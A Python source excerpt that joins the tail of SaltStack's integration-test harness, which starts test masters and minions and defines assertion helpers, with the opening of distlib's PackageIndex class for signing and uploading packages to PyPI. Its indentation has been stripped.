# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
TMP_STATE_TREE
],
# Alternate root to test __env__ choices
'prod': [
os.path.join(FILES, 'file', 'prod'),
TMP_PRODENV_STATE_TREE
]
}
self.master_opts['ext_pillar'].append(
{'cmd_yaml': 'cat {0}'.format(
os.path.join(
FILES,
'ext.yaml'
)
)}
)
self.master_opts['extension_modules'] = os.path.join(
INTEGRATION_TEST_DIR, 'files', 'extension_modules'
)
# clean up the old files
self._clean()
# Point the config values to the correct temporary paths
for name in ('hosts', 'aliases'):
optname = '{0}.file'.format(name)
optname_path = os.path.join(TMP, name)
self.master_opts[optname] = optname_path
self.minion_opts[optname] = optname_path
self.sub_minion_opts[optname] = optname_path
verify_env([os.path.join(self.master_opts['pki_dir'], 'minions'),
os.path.join(self.master_opts['pki_dir'], 'minions_pre'),
os.path.join(self.master_opts['pki_dir'],
'minions_rejected'),
os.path.join(self.master_opts['cachedir'], 'jobs'),
os.path.join(self.smaster_opts['pki_dir'], 'minions'),
os.path.join(self.smaster_opts['pki_dir'], 'minions_pre'),
os.path.join(self.smaster_opts['pki_dir'],
'minions_rejected'),
os.path.join(self.smaster_opts['cachedir'], 'jobs'),
os.path.dirname(self.master_opts['log_file']),
self.minion_opts['extension_modules'],
self.sub_minion_opts['extension_modules'],
self.sub_minion_opts['pki_dir'],
self.master_opts['sock_dir'],
self.smaster_opts['sock_dir'],
self.sub_minion_opts['sock_dir'],
self.minion_opts['sock_dir'],
TMP_STATE_TREE,
TMP_PRODENV_STATE_TREE,
TMP,
],
running_tests_user)
# Set up PATH to mockbin
self._enter_mockbin()
master = salt.master.Master(self.master_opts)
self.master_process = multiprocessing.Process(target=master.start)
self.master_process.start()
minion = salt.minion.Minion(self.minion_opts)
self.minion_process = multiprocessing.Process(target=minion.tune_in)
self.minion_process.start()
sub_minion = salt.minion.Minion(self.sub_minion_opts)
self.sub_minion_process = multiprocessing.Process(
target=sub_minion.tune_in
)
self.sub_minion_process.start()
smaster = salt.master.Master(self.smaster_opts)
self.smaster_process = multiprocessing.Process(target=smaster.start)
self.smaster_process.start()
syndic = salt.minion.Syndic(self.syndic_opts)
self.syndic_process = multiprocessing.Process(target=syndic.tune_in)
self.syndic_process.start()
if os.environ.get('DUMP_SALT_CONFIG', None) is not None:
from copy import deepcopy
try:
os.makedirs('/tmp/salttest/conf')
except OSError:
pass
master_opts = deepcopy(self.master_opts)
minion_opts = deepcopy(self.minion_opts)
master_opts.pop('conf_file', None)
minion_opts.pop('conf_file', None)
minion_opts.pop('grains', None)
minion_opts.pop('pillar', None)
open('/tmp/salttest/conf/master', 'w').write(
yaml.dump(master_opts)
)
open('/tmp/salttest/conf/minion', 'w').write(
yaml.dump(minion_opts)
)
self.minion_targets = set(['minion', 'sub_minion'])
self.pre_setup_minions()
self.setup_minions()
if self.parser.options.sysinfo:
try:
print_header(
'~~~~~~~ Versions Report ', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('~~~~~~~ Versions Report ', inline=True)
print('\n'.join(salt.version.versions_report()))
try:
print_header(
'~~~~~~~ Minion Grains Information ', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('~~~~~~~ Minion Grains Information ', inline=True)
grains = self.client.cmd('minion', 'grains.items')
minion_opts = self.minion_opts.copy()
minion_opts['color'] = self.parser.options.no_colors is False
salt.output.display_output(grains, 'grains', minion_opts)
try:
print_header(
'=', sep='=', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('', sep='=', inline=True)
try:
return self
finally:
self.post_setup_minions()
@property
def client(self):
'''
Return a local client which will be used for example to ping and sync
the test minions.
This client is defined as a class attribute because its creation needs
to be deferred to a latter stage. If created it on `__enter__` like it
previously was, it would not receive the master events.
'''
return salt.client.LocalClient(
mopts=self.master_opts
)
def __exit__(self, type, value, traceback):
'''
Kill the minion and master processes
'''
salt.master.clean_proc(self.sub_minion_process, wait_for_kill=50)
self.sub_minion_process.join()
salt.master.clean_proc(self.minion_process, wait_for_kill=50)
self.minion_process.join()
salt.master.clean_proc(self.master_process, wait_for_kill=50)
self.master_process.join()
salt.master.clean_proc(self.syndic_process, wait_for_kill=50)
self.syndic_process.join()
salt.master.clean_proc(self.smaster_process, wait_for_kill=50)
self.smaster_process.join()
self._exit_mockbin()
self._clean()
def pre_setup_minions(self):
'''
Subclass this method for additional minion setups.
'''
def setup_minions(self):
# Wait for minions to connect back
wait_minion_connections = multiprocessing.Process(
target=self.wait_for_minion_connections,
args=(self.minion_targets, self.MINIONS_CONNECT_TIMEOUT)
)
wait_minion_connections.start()
wait_minion_connections.join()
wait_minion_connections.terminate()
if wait_minion_connections.exitcode > 0:
print(
'\n {RED_BOLD}*{ENDC} ERROR: Minions failed to connect'.format(
**self.colors
)
)
return False
del wait_minion_connections
sync_needed = self.parser.options.clean
if self.parser.options.clean is False:
def sumfile(fpath):
# Since we will be do'in this for small files, it should be ok
fobj = fopen(fpath)
m = md5()
while True:
d = fobj.read(8096)
if not d:
break
m.update(d)
return m.hexdigest()
# Since we're not cleaning up, let's see if modules are already up
# to date so we don't need to re-sync them
modules_dir = os.path.join(FILES, 'file', 'base', '_modules')
for fname in os.listdir(modules_dir):
if not fname.endswith('.py'):
continue
dfile = os.path.join(
'/tmp/salttest/cachedir/extmods/modules/', fname
)
if not os.path.exists(dfile):
sync_needed = True
break
sfile = os.path.join(modules_dir, fname)
if sumfile(sfile) != sumfile(dfile):
sync_needed = True
break
if sync_needed:
# Wait for minions to "sync_all"
for target in [self.sync_minion_modules,
self.sync_minion_states]:
sync_minions = multiprocessing.Process(
target=target,
args=(self.minion_targets, self.MINIONS_SYNC_TIMEOUT)
)
sync_minions.start()
sync_minions.join()
if sync_minions.exitcode > 0:
return False
sync_minions.terminate()
del sync_minions
return True
def post_setup_minions(self):
'''
Subclass this method to execute code after the minions have been setup
'''
def _enter_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
if MOCKBIN not in path_items:
path_items.insert(0, MOCKBIN)
os.environ['PATH'] = os.pathsep.join(path_items)
def _exit_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
try:
path_items.remove(MOCKBIN)
except ValueError:
pass
os.environ['PATH'] = os.pathsep.join(path_items)
def _clean(self):
'''
Clean out the tmp files
'''
if not self.parser.options.clean:
return
if os.path.isdir(self.sub_minion_opts['root_dir']):
shutil.rmtree(self.sub_minion_opts['root_dir'])
if os.path.isdir(self.master_opts['root_dir']):
shutil.rmtree(self.master_opts['root_dir'])
if os.path.isdir(self.smaster_opts['root_dir']):
shutil.rmtree(self.smaster_opts['root_dir'])
for dirname in (TMP, TMP_STATE_TREE, TMP_PRODENV_STATE_TREE):
if os.path.isdir(dirname):
shutil.rmtree(dirname)
def wait_for_jid(self, targets, jid, timeout=120):
time.sleep(1) # Allow some time for minions to accept jobs
now = datetime.now()
expire = now + timedelta(seconds=timeout)
job_finished = False
while now <= expire:
running = self.__client_job_running(targets, jid)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
if not running and job_finished is False:
# Let's not have false positives and wait one more seconds
job_finished = True
elif not running and job_finished is True:
return True
elif running and job_finished is True:
job_finished = False
if job_finished is False:
sys.stdout.write(
' * {YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(running),
**self.colors
)
)
sys.stdout.flush()
time.sleep(1)
now = datetime.now()
else: # pylint: disable=W0120
sys.stdout.write(
'\n {RED_BOLD}*{ENDC} ERROR: Failed to get information '
'back\n'.format(**self.colors)
)
sys.stdout.flush()
return False
def __client_job_running(self, targets, jid):
running = self.client.cmd(
list(targets), 'saltutil.running', expr_form='list'
)
return [
k for (k, v) in running.iteritems() if v and v[0]['jid'] == jid
]
def wait_for_minion_connections(self, targets, timeout):
sys.stdout.write(
' {LIGHT_BLUE}*{ENDC} Waiting at most {0} for minions({1}) to '
'connect back\n'.format(
(timeout > 60 and
timedelta(seconds=timeout) or
'{0} secs'.format(timeout)),
', '.join(targets),
**self.colors
)
)
sys.stdout.flush()
expected_connections = set(targets)
now = datetime.now()
expire = now + timedelta(seconds=timeout)
while now <= expire:
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(expected_connections),
**self.colors
)
)
sys.stdout.flush()
responses = self.client.cmd(
list(expected_connections), 'test.ping', expr_form='list',
)
for target in responses:
if target not in expected_connections:
# Someone(minion) else "listening"?
continue
expected_connections.remove(target)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns',
PNUM)
)
)
sys.stdout.write(
' {LIGHT_GREEN}*{ENDC} {0} connected.\n'.format(
target, **self.colors
)
)
sys.stdout.flush()
if not expected_connections:
return
time.sleep(1)
now = datetime.now()
else: # pylint: disable=W0120
print(
'\n {RED_BOLD}*{ENDC} WARNING: Minions failed to connect '
'back. Tests requiring them WILL fail'.format(**self.colors)
)
try:
print_header(
'=', sep='=', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('=', sep='=', inline=True)
raise SystemExit()
def sync_minion_modules_(self, modules_kind, targets, timeout=None):
if not timeout:
timeout = 120
# Let's sync all connected minions
print(
' {LIGHT_BLUE}*{ENDC} Syncing minion\'s {1} '
'(saltutil.sync_{1})'.format(
', '.join(targets),
modules_kind,
**self.colors
)
)
syncing = set(targets)
jid_info = self.client.run_job(
list(targets), 'saltutil.sync_{0}'.format(modules_kind),
expr_form='list',
timeout=9999999999999999,
)
if self.wait_for_jid(targets, jid_info['jid'], timeout) is False:
print(
' {RED_BOLD}*{ENDC} WARNING: Minions failed to sync {0}. '
'Tests requiring these {0} WILL fail'.format(
modules_kind, **self.colors)
)
raise SystemExit()
while syncing:
rdata = self.client.get_full_returns(jid_info['jid'], syncing, 1)
if rdata:
for name, output in rdata.iteritems():
if not output['ret']:
# Already synced!?
syncing.remove(name)
continue
if isinstance(output['ret'], salt._compat.string_types):
# An errors has occurred
print(
' {RED_BOLD}*{ENDC} {0} Failed so sync {2}: '
'{1}'.format(
name, output['ret'],
modules_kind,
**self.colors)
)
return False
print(
' {LIGHT_GREEN}*{ENDC} Synced {0} {2}: '
'{1}'.format(
name,
', '.join(output['ret']),
modules_kind, **self.colors
)
)
# Synced!
try:
syncing.remove(name)
except KeyError:
print(
' {RED_BOLD}*{ENDC} {0} already synced??? '
'{1}'.format(name, output, **self.colors)
)
return True
def sync_minion_states(self, targets, timeout=None):
self.sync_minion_modules_('states', targets, timeout=timeout)
def sync_minion_modules(self, targets, timeout=None):
self.sync_minion_modules_('modules', targets, timeout=timeout)
class AdaptedConfigurationTestCaseMixIn(object):
__slots__ = ()
def get_config_dir(self):
integration_config_dir = os.path.join(
INTEGRATION_TEST_DIR, 'files', 'conf'
)
if os.getuid() == 0:
# Running as root, the running user does not need to be updated
return integration_config_dir
for triplet in os.walk(integration_config_dir):
partial = triplet[0].replace(integration_config_dir, "")[1:]
for fname in triplet[2]:
if fname.startswith(('.', '_')):
continue
self.get_config_file_path(os.path.join(partial, fname))
return TMP_CONF_DIR
def get_config_file_path(self, filename):
integration_config_file = os.path.join(
INTEGRATION_TEST_DIR, 'files', 'conf', filename
)
if os.getuid() == 0:
# Running as root, the running user does not need to be updated
return integration_config_file
updated_config_path = os.path.join(TMP_CONF_DIR, filename)
partial = os.path.dirname(updated_config_path)
if not os.path.isdir(partial):
os.makedirs(partial)
if not os.path.isfile(updated_config_path):
self.__update_config(integration_config_file, updated_config_path)
return updated_config_path
def __update_config(self, source, dest):
if not os.path.isfile(dest):
running_tests_user = pwd.getpwuid(os.getuid()).pw_name
configuration = yaml.load(open(source).read())
configuration['user'] = running_tests_user
open(dest, 'w').write(yaml.dump(configuration))
class SaltClientTestCaseMixIn(AdaptedConfigurationTestCaseMixIn):
_salt_client_config_file_name_ = 'master'
__slots__ = ('client', '_salt_client_config_file_name_')
@property
def client(self):
return salt.client.LocalClient(
self.get_config_file_path(self._salt_client_config_file_name_)
)
class ModuleCase(TestCase, SaltClientTestCaseMixIn):
'''
Execute a module function
'''
def minion_run(self, _function, *args, **kw):
'''
Run a single salt function on the 'minion' target and condition
the return down to match the behavior of the raw function call
'''
return self.run_function(_function, args, **kw)
def run_function(self, function, arg=(), minion_tgt='minion', timeout=25,
**kwargs):
'''
Run a single salt function and condition the return down to match the
behavior of the raw function call
'''
know_to_return_none = (
'file.chown', 'file.chgrp', 'ssh.recv_known_host'
)
orig = self.client.cmd(
minion_tgt, function, arg, timeout=timeout, kwarg=kwargs
)
if minion_tgt not in orig:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get a reply '
'from the minion \'{0}\'. Command output: {1}'.format(
minion_tgt, orig
)
)
elif orig[minion_tgt] is None and function not in know_to_return_none:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get \'{0}\' from '
'the minion \'{1}\'. Command output: {2}'.format(
function, minion_tgt, orig
)
)
# Try to match stalled state functions
orig[minion_tgt] = self._check_state_return(
orig[minion_tgt], func=function
)
return orig[minion_tgt]
def run_state(self, function, **kwargs):
'''
Run the state.single command and return the state return structure
'''
ret = self.run_function('state.single', [function], **kwargs)
return self._check_state_return(ret)
@property
def minion_opts(self):
'''
Return the options used for the minion
'''
return salt.config.minion_config(
self.get_config_file_path('minion')
)
@property
def sub_minion_opts(self):
'''
Return the options used for the minion
'''
return salt.config.minion_config(
self.get_config_file_path('sub_minion')
)
@property
def master_opts(self):
'''
Return the options used for the minion
'''
return salt.config.master_config(
self.get_config_file_path('master')
)
def _check_state_return(self, ret, func='state.single'):
if isinstance(ret, dict):
# This is the supposed return format for state calls
return ret
if isinstance(ret, list):
jids = []
# These are usually errors
for item in ret[:]:
if not isinstance(item, salt._compat.string_types):
# We don't know how to handle this
continue
match = STATE_FUNCTION_RUNNING_RE.match(item)
if not match:
# We don't know how to handle this
continue
jid = match.group('jid')
if jid in jids:
continue
jids.append(jid)
job_data = self.run_function(
'saltutil.find_job', [jid]
)
job_kill = self.run_function('saltutil.kill_job', [jid])
msg = (
'A running state.single was found causing a state lock. '
'Job details: {0!r} Killing Job Returned: {1!r}'.format(
job_data, job_kill
)
)
ret.append('[TEST SUITE ENFORCED]{0}'
'[/TEST SUITE ENFORCED]'.format(msg))
return ret
class SyndicCase(TestCase, SaltClientTestCaseMixIn):
'''
Execute a syndic based execution test
'''
_salt_client_config_file_name_ = 'syndic_master'
def run_function(self, function, arg=()):
'''
Run a single salt function and condition the return down to match the
behavior of the raw function call
'''
orig = self.client.cmd('minion', function, arg, timeout=25)
if 'minion' not in orig:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get a reply '
'from the minion. Command output: {0}'.format(orig)
)
return orig['minion']
class ShellCase(AdaptedConfigurationTestCaseMixIn, ShellTestCase):
'''
Execute a test for a shell command
'''
_code_dir_ = CODE_DIR
_script_dir_ = SCRIPT_DIR
_python_executable_ = PYEXEC
def run_salt(self, arg_str, with_retcode=False, catch_stderr=False):
'''
Execute salt
'''
arg_str = '-c {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script('salt', arg_str, with_retcode=with_retcode, catch_stderr=catch_stderr)
def run_run(self, arg_str, with_retcode=False, catch_stderr=False):
'''
Execute salt-run
'''
arg_str = '-c {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script('salt-run', arg_str, with_retcode=with_retcode, catch_stderr=catch_stderr)
def run_run_plus(self, fun, options='', *arg, **kwargs):
'''
Execute Salt run and the salt run function and return the data from
each in a dict
'''
ret = {}
ret['out'] = self.run_run(
'{0} {1} {2}'.format(options, fun, ' '.join(arg)), catch_stderr=kwargs.get('catch_stderr', None)
)
opts = salt.config.master_config(
self.get_config_file_path('master')
)
opts.update({'doc': False, 'fun': fun, 'arg': arg})
with RedirectStdStreams():
runner = salt.runner.Runner(opts)
ret['fun'] = runner.run()
return ret
def run_key(self, arg_str, catch_stderr=False, with_retcode=False):
'''
Execute salt-key
'''
arg_str = '-c {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script(
'salt-key',
arg_str,
catch_stderr=catch_stderr,
with_retcode=with_retcode
)
def run_cp(self, arg_str, with_retcode=False, catch_stderr=False):
'''
Execute salt-cp
'''
arg_str = '--config-dir {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script('salt-cp', arg_str, with_retcode=with_retcode, catch_stderr=catch_stderr)
def run_call(self, arg_str, with_retcode=False, catch_stderr=False):
arg_str = '--config-dir {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script('salt-call', arg_str, with_retcode=with_retcode, catch_stderr=catch_stderr)
def run_cloud(self, arg_str, catch_stderr=False, timeout=None):
'''
Execute salt-cloud
'''
arg_str = '-c {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script('salt-cloud', arg_str, catch_stderr, timeout)
class ShellCaseCommonTestsMixIn(CheckShellBinaryNameAndVersionMixIn):
_call_binary_expected_version_ = salt.__version__
def test_salt_with_git_version(self):
if getattr(self, '_call_binary_', None) is None:
self.skipTest('\'_call_binary_\' not defined.')
from salt.utils import which
from salt.version import __version_info__, SaltStackVersion
git = which('git')
if not git:
self.skipTest('The git binary is not available')
# Let's get the output of git describe
process = subprocess.Popen(
[git, 'describe', '--tags', '--match', 'v[0-9]*'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=CODE_DIR
)
out, err = process.communicate()
if not out:
self.skipTest(
'Failed to get the output of \'git describe\'. '
'Error: {0!r}'.format(
err
)
)
parsed_version = SaltStackVersion.parse(out)
if parsed_version.info < __version_info__:
self.skipTest(
'We\'re likely about to release a new version. This test '
'would fail. Parsed({0!r}) < Expected({1!r})'.format(
parsed_version.info, __version_info__
)
)
elif parsed_version.info != __version_info__:
self.skipTest(
'In order to get the proper salt version with the '
'git hash you need to update salt\'s local git '
'tags. Something like: \'git fetch --tags\' or '
'\'git fetch --tags upstream\' if you followed '
'salt\'s contribute documentation. The version '
'string WILL NOT include the git hash.'
)
out = '\n'.join(self.run_script(self._call_binary_, '--version'))
self.assertIn(parsed_version.string, out)
class SaltReturnAssertsMixIn(object):
def assertReturnSaltType(self, ret):
try:
self.assertTrue(isinstance(ret, dict))
except AssertionError:
raise AssertionError(
'{0} is not dict. Salt returned: {1}'.format(
type(ret).__name__, ret
)
)
def assertReturnNonEmptySaltType(self, ret):
self.assertReturnSaltType(ret)
try:
self.assertNotEqual(ret, {})
except AssertionError:
raise AssertionError(
'{} is equal to {}. Salt returned an empty dictionary.'
)
def __return_valid_keys(self, keys):
if isinstance(keys, tuple):
# If it's a tuple, turn it into a list
keys = list(keys)
elif isinstance(keys, basestring):
# If it's a basestring , make it a one item list
keys = [keys]
elif not isinstance(keys, list):
# If we've reached here, it's a bad type passed to keys
raise RuntimeError('The passed keys need to be a list')
return keys
def __getWithinSaltReturn(self, ret, keys):
self.assertReturnNonEmptySaltType(ret)
keys = self.__return_valid_keys(keys)
okeys = keys[:]
for part in ret.itervalues():
try:
ret_item = part[okeys.pop(0)]
except (KeyError, TypeError):
raise AssertionError(
'Could not get ret{0} from salt\'s return: {1}'.format(
''.join(['[{0!r}]'.format(k) for k in keys]), part
)
)
while okeys:
try:
ret_item = ret_item[okeys.pop(0)]
except (KeyError, TypeError):
raise AssertionError(
'Could not get ret{0} from salt\'s return: {1}'.format(
''.join(['[{0!r}]'.format(k) for k in keys]), part
)
)
return ret_item
def assertSaltTrueReturn(self, ret):
try:
self.assertTrue(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not True. Salt Comment:\n{comment}'.format(
**(ret.values()[0])
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned:\n{0}'.format(
pprint.pformat(ret)
)
)
def assertSaltFalseReturn(self, ret):
try:
self.assertFalse(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not False. Salt Comment:\n{comment}'.format(
**(ret.values()[0])
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertSaltNoneReturn(self, ret):
try:
self.assertIsNone(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not None. Salt Comment:\n{comment}'.format(
**(ret.values()[0])
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertInSaltComment(self, in_comment, ret):
return self.assertIn(
in_comment, self.__getWithinSaltReturn(ret, 'comment')
)
def assertNotInSaltComment(self, not_in_comment, ret):
return self.assertNotIn(
not_in_comment, self.__getWithinSaltReturn(ret, 'comment')
)
def assertSaltCommentRegexpMatches(self, ret, pattern):
return self.assertInSaltReturnRegexpMatches(ret, pattern, 'comment')
def assertInSalStatetWarning(self, in_comment, ret):
return self.assertIn(
in_comment, self.__getWithinSaltReturn(ret, 'warnings')
)
def assertNotInSaltStateWarning(self, not_in_comment, ret):
return self.assertNotIn(
not_in_comment, self.__getWithinSaltReturn(ret, 'warnings')
)
def assertInSaltReturn(self, item_to_check, ret, keys):
return self.assertIn(
item_to_check, self.__getWithinSaltReturn(ret, keys)
)
def assertNotInSaltReturn(self, item_to_check, ret, keys):
return self.assertNotIn(
item_to_check, self.__getWithinSaltReturn(ret, keys)
)
def assertInSaltReturnRegexpMatches(self, ret, pattern, keys=()):
return self.assertRegexpMatches(
self.__getWithinSaltReturn(ret, keys), pattern
)
def assertSaltStateChangesEqual(self, ret, comparison, keys=()):
keys = ['changes'] + self.__return_valid_keys(keys)
return self.assertEqual(
self.__getWithinSaltReturn(ret, keys), comparison
)
def assertSaltStateChangesNotEqual(self, ret, comparison, keys=()):
keys = ['changes'] + self.__return_valid_keys(keys)
return self.assertNotEqual(
self.__getWithinSaltReturn(ret, keys), comparison
)
class ClientCase(AdaptedConfigurationTestCaseMixIn, TestCase):
'''
A base class containing relevant options for starting the various Salt
Python API entrypoints
'''
def get_opts(self):
return salt.config.client_config(self.get_config_file_path('master'))
def mkdir_p(self, path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
|
index.py | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
try:
from threading import Thread
except ImportError:
from dummy_threading import Thread
from . import DistlibException
from .compat import (HTTPBasicAuthHandler, Request, HTTPPasswordMgr,
urlparse, build_opener, string_types)
from .util import cached_property, zip_dir, ServerProxy
logger = logging.getLogger(__name__)
DEFAULT_INDEX = 'https://pypi.python.org/pypi'
DEFAULT_REALM = 'pypi'
class PackageIndex(object):
"""
This class represents a package index compatible with PyPI, the Python
Package Index.
"""
boundary = b'----------ThIs_Is_tHe_distlib_index_bouNdaRY_$'
def __init__(self, url=None):
"""
Initialise an instance.
:param url: The URL of the index. If not specified, the URL for PyPI is
used.
"""
self.url = url or DEFAULT_INDEX
self.read_configuration()
scheme, netloc, path, params, query, frag = urlparse(self.url)
if params or query or frag or scheme not in ('http', 'https'):
raise DistlibException('invalid repository: %s' % self.url)
self.password_handler = None
self.ssl_verifier = None
self.gpg = None
self.gpg_home = None
self.rpc_proxy = None
with open(os.devnull, 'w') as sink:
# Use gpg by default rather than gpg2, as gpg2 insists on
# prompting for passwords
for s in ('gpg', 'gpg2'):
try:
rc = subprocess.check_call([s, '--version'], stdout=sink,
stderr=sink)
if rc == 0:
self.gpg = s
break
except OSError:
pass
def _get_pypirc_command(self):
"""
Get the distutils command for interacting with PyPI configurations.
:return: the command.
"""
from distutils.core import Distribution
from distutils.config import PyPIRCCommand
d = Distribution()
return PyPIRCCommand(d)
def read_configuration(self):
"""
Read the PyPI access configuration as supported by distutils, getting
PyPI to do the actual work. This populates ``username``, ``password``,
``realm`` and ``url`` attributes from the configuration.
"""
# get distutils to do the work
c = self._get_pypirc_command()
c.repository = self.url
cfg = c._read_pypirc()
self.username = cfg.get('username')
self.password = cfg.get('password')
self.realm = cfg.get('realm', 'pypi')
self.url = cfg.get('repository', self.url)
def save_configuration(self):
"""
Save the PyPI access configuration. You must have set ``username`` and
``password`` attributes before calling this method.
Again, distutils is used to do the actual work.
"""
self.check_credentials()
# get distutils to do the work
c = self._get_pypirc_command()
c._store_pypirc(self.username, self.password)
def check_credentials(self):
"""
Check that ``username`` and ``password`` have been set, and raise an
exception if not.
"""
if self.username is None or self.password is None:
raise DistlibException('username and password must be set')
pm = HTTPPasswordMgr()
_, netloc, _, _, _, _ = urlparse(self.url)
pm.add_password(self.realm, netloc, self.username, self.password)
self.password_handler = HTTPBasicAuthHandler(pm)
def register(self, metadata):
"""
Register a distribution on PyPI, using the provided metadata.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the distribution to be
registered.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
metadata.validate()
d = metadata.todict()
d[':action'] = 'verify'
request = self.encode_request(d.items(), [])
response = self.send_request(request)
d[':action'] = 'submit'
request = self.encode_request(d.items(), [])
return self.send_request(request)
def _reader(self, name, stream, outbuf):
"""
Thread runner for reading lines of from a subprocess into a buffer.
:param name: The logical name of the stream (used for logging only).
:param stream: The stream to read from. This will typically a pipe
connected to the output stream of a subprocess.
:param outbuf: The list to append the read lines to.
"""
while True:
s = stream.readline()
if not s:
break
s = s.decode('utf-8').rstrip()
outbuf.append(s)
logger.debug('%s: %s' % (name, s))
stream.close()
def get_sign_command(self, filename, signer, sign_password,
keystore=None):
"""
Return a suitable command for signing a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The signing command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
if sign_password is not None:
cmd.extend(['--batch', '--passphrase-fd', '0'])
td = tempfile.mkdtemp()
sf = os.path.join(td, os.path.basename(filename) + '.asc')
cmd.extend(['--detach-sign', '--armor', '--local-user',
signer, '--output', sf, filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd, sf
def run_command(self, cmd, input_data=None):
"""
Run a command in a child process , passing it any input data specified.
:param cmd: The command to run.
:param input_data: If specified, this must be a byte string containing
data to be sent to the child process.
:return: A tuple consisting of the subprocess' exit code, a list of
lines read from the subprocess' ``stdout``, and a list of
lines read from the subprocess' ``stderr``.
"""
kwargs = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
}
if input_data is not None:
kwargs['stdin'] = subprocess.PIPE
stdout = []
stderr = []
p = subprocess.Popen(cmd, **kwargs)
# We don't use communicate() here because we may need to
# get clever with interacting with the command
t1 = Thread(target=self._reader, args=('stdout', p.stdout, stdout))
t1.start()
t2 = Thread(target=self._reader, args=('stderr', p.stderr, stderr))
t2.start()
if input_data is not None:
p.stdin.write(input_data)
p.stdin.close()
p.wait()
t1.join()
t2.join()
return p.returncode, stdout, stderr
def sign_file(self, filename, signer, sign_password, keystore=None):
"""
Sign a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The absolute pathname of the file where the signature is
stored.
"""
cmd, sig_file = self.get_sign_command(filename, signer, sign_password,
keystore)
rc, stdout, stderr = self.run_command(cmd,
sign_password.encode('utf-8'))
if rc != 0:
raise DistlibException('sign command failed with error '
'code %s' % rc)
return sig_file
def upload_file(self, metadata, filename, signer=None, sign_password=None,
filetype='sdist', pyversion='source', keystore=None):
"""
Upload a release file to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the file to be uploaded.
:param filename: The pathname of the file to be uploaded.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param filetype: The type of the file being uploaded. This is the
distutils command which produced that file, e.g.
``sdist`` or ``bdist_wheel``.
:param pyversion: The version of Python which the release relates
to. For code compatible with any Python, this would
be ``source``, otherwise it would be e.g. ``3.2``.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.exists(filename):
raise DistlibException('not found: %s' % filename)
metadata.validate()
d = metadata.todict()
sig_file = None
if signer:
if not self.gpg:
logger.warning('no signing program available - not signed')
else:
sig_file = self.sign_file(filename, signer, sign_password,
keystore)
with open(filename, 'rb') as f:
file_data = f.read()
md5_digest = hashlib.md5(file_data).hexdigest()
sha256_digest = hashlib.sha256(file_data).hexdigest()
d.update({
':action': 'file_upload',
'protocol_version': '1',
'filetype': filetype,
'pyversion': pyversion,
'md5_digest': md5_digest,
'sha256_digest': sha256_digest,
})
files = [('content', os.path.basename(filename), file_data)]
